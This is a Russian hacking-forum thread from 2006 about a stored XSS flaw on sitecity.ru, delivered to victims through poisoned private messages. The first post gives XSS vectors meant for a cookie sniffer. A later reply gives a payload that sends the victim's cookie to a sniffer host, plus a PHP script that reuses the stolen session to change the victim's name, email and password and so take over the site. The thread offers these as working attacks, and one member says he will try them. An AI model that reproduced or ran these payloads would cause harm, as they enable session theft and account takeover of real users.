HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Имеем аккаунт на sitecity.ru (активная XSS)
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Имеем аккаунт на sitecity.ru (активная XSS)
  #1  
Старый 26.05.2006, 22:24
_kREveDKo_
Banned
Регистрация: 04.12.2005
Сообщений: 826
С нами: 10754246

Репутация: 3813


Cool Имеем аккаунт на sitecity.ru (активная XSS)
Вот две XSS, позволяющие стянуть кукисы с помощью ядовитого письма. (отсылается, когда заходишь под своим аккаунтоми - шлёшь на чужой логин)

<script src="javascript:alert(/ваш сниффер/);"></script>

<iframe BORDER=0 HEIGHT=0 WIDTH=0 src="javascript:alert(/для сниффера тоже/);"></iframe>
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 26.05.2006, 23:16
WEED
Познающий
Регистрация: 28.03.2006
Сообщений: 90
С нами: 10590038

Репутация: 25
По умолчанию
Щас испробуем..............
 
Ответить с цитированием

  #3  
Старый 30.05.2006, 00:24
PinkPanther
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
С нами: 11133086

Репутация: 241
По умолчанию
Отрывок из моей статьи, кторую я все обещаю выложить, да все никак руки не доходят ))


любой банальный XSS скрипт в ЛС, например:
Код:
<img src="http://sasa" style="background:white url(javascript:document.images[0].src='http://sniff/s.php?'+document.cookie)">
Изменим пароль, имя с фамилией и емейл. (Кстати можно пойти от дефа и аж до удаления сайта, подтверждающих паролей нет нигде)

PHP код:
<? 
$nick="PinkPanther";
$mail="qwerty@qwerty.ru";
$new_password="123456";
 
$query=$_SERVER["QUERY_STRING"];
$query=urldecode($query);
$refer=getenv("HTTP_REFERER");
$ref1=strpos($refer,"id=")+3
$session=substr($refer,$ref1,32); 
 
$post="sid=".$session."&act=send&uname=".$nick."&email=".$m ail."&passwd_1=".$new_password."&passwd_2=".$new_password."&pager_type=non&pager=&lang=rus&gpasswd=&is_news=on&is_notify=on&news_encoding=koi&news_lang=rus&%C8%E7%EC%E5%ED% E8%F2%FC=%C8%E7%EC%E5%ED%E8%F2%FC";
 
$len=strlen($post);
 
$header="POST http://sitecity.ru/adm_base.phtml HTTP/1.0 ";
$header.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */* ";
$header.="Referer: http://sitecity.ru/adm_base.phtml?sid=".$session." ";
$header.="Content-Type: application/x-www-form-urlencoded ";
$header.="Host: sitecity.ru ";
$header.="Content-Length: $len ";
$header.="Cookie: ".$query." ";
$header.=" ";
$header.=$post
 
$fp=fsockopen("sitecity.ru"80); 
fwrite($fp$header); 
fclose($fp); 
?>
Вот так вот. Теперь мы имеем полный контроль над захваченным сайтом.
Еще хочу заметить, что на этом, баги не заканчиваются))

Так же, прочитавших это, по человечески прошу никогда не делать подобное:
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
XSS (passive) на sitecity.ru _kREveDKo_ Уязвимости 2 20.05.2006 23:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.